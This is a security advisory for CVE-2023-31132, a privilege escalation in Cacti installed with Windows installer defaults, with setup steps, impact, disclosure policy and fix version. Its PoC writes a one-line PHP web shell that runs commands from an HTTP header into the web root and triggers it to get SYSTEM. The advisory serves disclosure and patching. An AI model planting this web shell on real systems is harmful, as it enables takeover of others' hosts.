Headline
CVE-2023-31132: Privilege escalation when Cacti installed using Windows Installer defaults
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a privilege escalation vulnerability. A low-privileged OS user with access to a Windows host where Cacti is installed can create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM. This allows an attacker to escalate privilege from a normal user account to SYSTEM. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Summary
Short summary of the problem. Make the impact and severity as clear as possible. For example: An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the server.
A researcher within Tenable has discovered a privilege escalation vulnerability in Cacti 1.2.24. A low-privileged OS user with access to a Windows host where Cacti is installed can create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
We believe the vulnerability has a CVSSv3 vector of CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. We have verified this issue with Cacti 1.2.24 installed on a Windows Server 2019 virtual machine. Here are the steps we used to set up the application:
- Download and run installer Cacti-1.2.24.exe as Administrator
- Select Apache as the web server and use defaults for other settings
- Login to the Cacti web UI to finish the initial Cacti configuration
- Create a low-privileged OS user (i.e., user1 in Users group) with RDP privilege
PoC:
// After login/RDP as user1
PS C:\Users\user1> echo '<?php system($_SERVER[''HTTP_X_CMD'']);?>' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty Content
nt authority\system
Impact
What kind of vulnerability is it? Who is impacted?
Privilege escalation from normal user account to SYSTEM.
Disclosure Policy
Tenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we’ll issue an advisory on June 18, 2023 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf.
This issue is tracked internally via TRA-469.
Thank you for taking the time to read this. We’d greatly appreciate it if you’d acknowledge receipt of this report. If you have any questions, we’d be happy to address them.
BETA Installer version
A beta version of the 1.2.25 installer has been published along with a post on our forum regarding this at https://forums.cacti.net/viewtopic.php?p=292797#p292797 which should be read prior to installing. This is not a production-ready release.